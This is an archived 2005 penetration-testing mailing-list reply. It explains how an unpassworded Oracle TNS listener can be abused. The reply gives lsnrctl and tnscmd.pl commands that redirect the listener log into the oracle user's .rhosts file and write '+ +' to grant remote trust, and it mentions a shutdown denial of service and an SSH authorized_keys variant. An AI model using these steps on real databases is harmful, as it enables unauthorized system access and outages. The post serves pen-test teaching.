Home page logo
/

pen-test logo Penetration Testing mailing list archives

Re: Oracle Auditing
From: Joshua Wright <jwright () hasborg com>
Date: Tue, 02 Aug 2005 21:49:55 -0400

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Joe,

Joe T wrote:
When performing some network scans, I notice that the Oracle database
rarely has a password set for the tnslsnr account.
My question becomes: Has anyone exploited this misconfiguration, and
if so - how? Is this an account that you can connect to without
expensive Oracle software?

If the listener is not password protected, it's possible to change the
configuration of the listener or simply shut it down to cause a DoS.  To
do something more devious, we can use the listener logging feature:

(on the attacker's machine with a local copy of lsnrctl):

eve$ lsnrctl
LSNRCTL> set current_listener target_ip_or_host
LSNRCTL> set log_file /home/oracle/.rhosts
LSNRCTL> exit

This will configure the listener to write logging information to the
specified file.  Next, we can use the tnscmd.pl tool to send a raw
string to the victim TNS listener:

eve$ tnscmd.pl -h target_ip_or_host --rawcmd "(CONNECT_DATA=((
+ +
"
eve$

This will connect to the listener and send the string
"(CONNECT_DATA=((<CR>+ +<CR>".  This information gets written to the
listener log file, which would produce a single line with "+ +".

If the target isn't running r-services, you can use other techniques to
obtain access to the remote OS.  Perhaps ~oracle/.ssh/authorized_key2?

Note that you can download a trial version of the Oracle database from
otn.oracle.com, which would allow you to grab a copy of the lsnrctl tool.

This sample hack and several other Oracle auditing, assessment and
pen-test techniques are covered in the SANS Securing Oracle course.
SANS is offering the Securing Oracle course at our yearly Network
Security conference in New Orleans on 10/24-10/30.  More information on
the Securing Oracle course and the topics covered is available at
http://www.sans.org/ns2005/description.php?tid=247.

NB: I work for the SANS Institute, and teach the Securing Oracle class
(although I'll be teaching Assessing and Securing Wireless at the
Network Security conference).

- -Josh
- --
- -Joshua Wright
jwright () hasborg com

2005-2006 pgpkey: http://802.11ninja.net/pgpkey.htm
fingerprint: F00E 7A42 8375 0C55 964F E5A4 4D2F 22F6 3658 A4BF

Today I stumbled across the world's largest hotspot.  The SSID is "linksys".
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (MingW32)
Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org

iD8DBQFC8CLCTS8i9jZYpL8RAhDjAJ9oiXjl2HJaOjrGGC4GfBl6ZZKLiQCdFP3J
JM9FKGY6qCIk304rh4+LxLI=
=C64z
-----END PGP SIGNATURE-----

------------------------------------------------------------------------------
FREE WHITE PAPER - Wireless LAN Security: What Hackers Know That You Don't

Learn the hacker's secrets that compromise wireless LANs. Secure your
WLAN by understanding these threats, available hacking tools and proven
countermeasures. Defend your WLAN against man-in-the-Middle attacks and
session hijacking, denial-of-service, rogue access points, identity
thefts and MAC spoofing. Request your complimentary white paper at:

http://www.securityfocus.com/sponsor/AirDefense_pen-test_050801
-------------------------------------------------------------------------------


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]